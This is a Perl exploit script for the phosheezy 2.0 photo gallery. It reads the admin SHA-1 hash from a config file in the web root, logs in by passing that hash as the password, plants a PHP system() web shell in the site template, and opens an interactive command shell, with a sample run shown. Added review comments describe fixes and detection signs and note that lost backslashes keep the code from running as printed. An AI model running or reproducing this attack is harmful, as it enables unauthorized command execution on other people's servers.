
# Title : phosheezy 2.0 Remote Command Execution Exploit
# Published : 2009-01-14
# Author : Osirys


#!/usr/bin/perl

# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: HaVoC, x0r, jay, BlackLight
# lol at athos

# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
#   ----------------------------
#      Phosheezy RCE Exploit
#         Coded by Osirys
#   ----------------------------
#
# [+] Admin password found:
#     Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

# ---------------------------------------------------------------------------
# Main flow.  The only input is a base URL taken from the command line
# (usage text in help(): "perl $0 http://hostname/cms_path").  Everything
# below runs at file scope; $datas, $h0st, $path and $password are package
# globals (no "my") that the subroutines further down read directly.
# NOTE(review): the archived text appears to have lost its backslash
# characters -- literals ending in "n" / "rn" read as former newline / CRLF
# escapes -- so this listing documents the technique rather than being a
# runnable file as printed.
# ---------------------------------------------------------------------------
my $host       =  $ARGV[0];
my $pwd_path   =  "/config/password";    # fetched over plain HTTP below: the credential store sits inside the web root
my $adm_path   =  "/admin.php";          # login endpoint (POST, see adm_log)
my $templ_path =  "/admin.php?action=3"; # layout/template editor (POST, see RCE_create)

help("-1") unless ($host);               # no argument -> usage and exit
cheek($host) == 1 || help("-2");         # cheek() accepts only "http://..." (no https; port 80 is hard-coded later)
&banner;

# get_data() returns "<host> <path>" as one space-separated string; split it
# back into the globals $h0st / $path used by the raw-socket requests.
$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

# Weakness 1: the script expects the admin password file to be served as a
# plain HTTP resource.
my $url = $host.$pwd_path;
my $re = get_req($url);

# Any 40-hex-char run in the body is taken to be the SHA-1 of the admin
# password.  Weakness 2 (pass-the-hash): adm_log() submits this digest
# verbatim in the "password" field, which can only succeed if the
# application compares the submitted value against the stored digest
# without hashing it first -- TODO confirm against application source.
# Mitigation on the application side: keep credential files outside the
# document root (or deny web access to the config directory) and hash the
# submitted password before comparison.  Detection: GET requests for
# /config/password, and login POSTs whose password field is exactly 40 hex
# characters.
if ($re =~ /([0-9a-f]{40})/) {
    $password = $1;
    print "[+] Admin password found:n";
    print "    Sha1 pwd: $password  n";
    adm_log($password);
}
else {
    print "[-] Unable to get sha1 Admin passwordnn";
    exit(0);
}

# Log in to the admin interface with the recovered digest and harvest the
# session cookie.  Reads the globals $h0st, $path and $adm_path set at file
# scope; sets the globals $log_ and $phpsessid as side effects, then hands
# the session id to RCE_create().
# The empty "()" prototype has no effect: the call at file scope precedes
# this definition, so the prototype is unknown at the call site (and
# prototypes are not argument validation in any case).
sub adm_log() {
    my $password =  $_[0];
    my $link     =  $path.".".$adm_path;   # as written this puts a literal "." between the CMS path and /admin.php -- may be an artefact of the archived text
    my $post     =  "password=$password&Login=Login";   # the SHA-1 digest itself is sent as the password
    my $length   =  length($post);
    my @data;
    # Plain TCP to port 80 with a hand-built request (indirect-object
    # "new Class(...)" syntax; IO::Socket::INET->new is the conventional
    # form), presumably so the raw Set-Cookie header can be read back.
    my $socket   =  new IO::Socket::INET(
                                          PeerAddr => $h0st,
                                          PeerPort => '80',
                                          Proto    => 'tcp',
                                        ) or die $!;

    my $data = "POST ".$link." HTTP/1.1rn".
               "Host: ".$h0st."rn".
               "Content-Type: application/x-www-form-urlencodedrn".
               "Content-Length: ".$length."rnrn".
               $post."rn";

    $socket->send($data);
    print "[+] Grabbing server headers to get a valid SESSION ID ..n";

    # Buffer the whole response (headers and body) until the server closes
    # the connection, then scan it line by line.
    while (my $e = <$socket>) {
        push(@data,$e);
    }
    foreach my $e(@data) {
        # Success marker is a string from the admin page body ...
        if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) {
            $log_ = 1;
            print "[+] Succesfully logged in as Administratorn";
        }
        # ... and the session id comes from the Set-Cookie response header.
        elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
            $phpsessid = $1;
            print "[+] SESSION ID grabbed: $phpsessidn";
        }
    }

    # Both the page marker and a cookie are required; either missing aborts.
    (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!n";
    RCE_create($phpsessid);
}

# Use the harvested session to save a layout/template whose footer contains
# a PHP system() call driven by the "cmd" query parameter.  Reads the
# globals $h0st, $path and $templ_path; sets the global $rce_c; then enters
# the interactive loop in exec_cmd().
# Weakness 3: the layout fields are accepted from the admin form and, for
# this to work, must end up in a file that PHP interprets -- TODO confirm
# against application source.  Mitigation: store templates as data and
# render them without ever evaluating them as PHP.  Detection: POST bodies
# to admin.php?action=3 containing "<?php" or "system(", file-integrity
# monitoring on the template files, and web-shell scanning for
# "$_GET[cmd]".
sub RCE_create() {
    my $phpsessid = $_[0];
    my $link     =  $path.".".$templ_path;   # same "." join as adm_log()
    # The payload is wrapped in "<!-- cmd -->" ... "<!--cmd-->" so that
    # exec_cmd() can cut the command output out of the rendered page.
    # The HTML attribute quotes and the "$" sigil appear unescaped in the
    # archived text.
    my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit".
               "le></head><body bgcolor="#ffffff" text="#0000".
               "00">&footer=</body></html><!-- cmd --><?php sys".
               "tem($_GET[cmd]);?><!--cmd-->&Submit=Edit Layout";
    my $length =  length($code);

    my $socket = new IO::Socket::INET(
                                       PeerAddr => $h0st,
                                       PeerPort => '80',
                                       Proto    => 'tcp',
                                     ) or die $!;

    # Raw POST; the session id travels in the Cookie header together with a
    # fixed "hotlog=1" cookie.
    my $data = "POST ".$link." HTTP/1.1rn".
               "Host: ".$h0st."rn".
               "Cookie: PHPSESSID=".$phpsessid."; hotlog=1rn".
               "Content-Type: application/x-www-form-urlencodedrn".
               "Content-Length: ".$length."rnrn".
               "$codern";

    $socket->send($data);

    # Success is inferred from a string in the response page.
    while (my $e = <$socket>) {
        if ($e =~ /Edit layout again/) {
            $rce_c = 1;
            print "[+] Template edited, RCE Vulnerability Created !n";
        }
    }

    $rce_c == 1 || die "[-] Can't edit Template. Exploit failednn";
    &exec_cmd;
}

# Interactive pseudo-shell over the injected template.  Reads the global
# $host; each line typed is sent as the "cmd" query parameter of index.php
# and the reply is cut out from between the "<!-- cmd -->" / "<!--cmd-->"
# markers planted by RCE_create().  A line containing "exit" terminates
# via die.
# Note: the loop is written as self-recursion (&exec_cmd at the end of each
# branch), so every command issued adds a frame to the Perl call stack.
# Detection: GET requests for index.php whose "cmd" parameter carries
# shell-like values, and responses containing the "<!-- cmd -->" marker.
sub exec_cmd {
    print "shell$> ";        # "$>" inside a double-quoted string interpolates Perl's effective UID
    $cmd = <STDIN>;          # package global; read as typed
    $cmd !~ /exit/ || die "[-] Quitting ..n";
    $exec_url = ($host."/index.php?cmd=".$cmd);   # placed in the query string as-is
    $re = get_req($exec_url);
    if ($re =~ /<!-- cmd -->(.*)/) {
        # (.*) without /s stops at the first newline, so only the remainder
        # of the line holding the opening marker is captured.
        my $cmd = $1;        # lexical; shadows the global $cmd above
        # If the closing marker is still present in the captured text it is
        # replaced by the placeholder message.
        $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/;
        print "$cmdn";
        &exec_cmd;
    }
    else {
        print "[-] Undefined output or bad cmd !n";
        &exec_cmd;
    }
}

# GET a URL and return the response body, whatever the status code.
# Callers: the password-file fetch at file scope and exec_cmd().
# Note: $link is a package global here (no "my"); the lexical $link in
# adm_log()/RCE_create() is a different variable.  The body is returned
# without checking $response->is_success, so an error page (or LWP's own
# internal error response on timeout) is handed back like any other
# content.  No User-Agent is set, so LWP's default ("libwww-perl/<version>")
# is sent -- a useful field to alert on in web logs alongside requests for
# /config/password.
sub get_req() {
    $link   = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(4);                     # seconds
    my $response = $ua->request($req);
    return $response->content;
}

# Return 1 if the argument contains "http://", else 0.  Used at file scope
# to reject anything that is not a plain-http URL (https is not supported;
# the raw-socket requests later hard-code port 80).  The pattern is not
# anchored, and the unescaped "/" inside it as printed suggests the
# archived text lost its backslashes.
sub cheek() {
    my $host = $_[0];
    if ($host =~ /http://(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

# Split the command-line URL into hostname and CMS path and return them as
# one string, "<host> <path>", for the caller to split again.  Also assigns
# the package globals $s_host, $h0st, $path and $full_det as a side effect
# (the caller then overwrites $h0st/$path with the same values).
# As printed, the unescaped "/" inside the patterns suggests the archived
# text lost its backslashes.
sub get_data() {
    my $host = $_[0];
    $host =~ /http://(.*)/;                 # drop the scheme
    $s_host = $1;
    $s_host =~ /([a-z.]{1,30})/(.*)/;       # host = lowercase letters and dots only; remainder = path
    ($h0st,$path) = ($1,$2);
    $h0st !~ /www/ || $h0st =~ s/www.//;    # if the host contains "www", strip the first "www" plus one more character ("." is unescaped)
    $path =~ s/(.*)//$1/;                   # presumably trims a trailing slash from the path -- pattern garbled as archived
    $full_det = $h0st." ".$path;
    return $full_det;
}

# Print the tool banner.  Called at file scope and from help().  The
# trailing "n" in each fragment reads as a former "\n" escape lost in the
# archived text.
sub banner {
    print "n".
          "  ---------------------------- n".
          "     Phosheezy RCE Exploit     n".
          "        Coded by Osirys        n".
          "  ---------------------------- nn";
}

# Print a diagnostic plus the usage line, then exit.  $error selects the
# diagnostic (the string arguments "-1"/"-2" are compared numerically):
#   -1  no hostname argument was given
#   -2  the argument does not contain "http://" (cheek() failed)
# Any other value prints the usage line only.  Exits with status 0 even
# though this is only reached on error.
sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "n[-] Cheek that you provide a hostname address!n";
    }
    elsif ($error == -2) {
        &banner;
        print "n[-] Bad hostname address !n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_pathnn";
    exit(0);
}
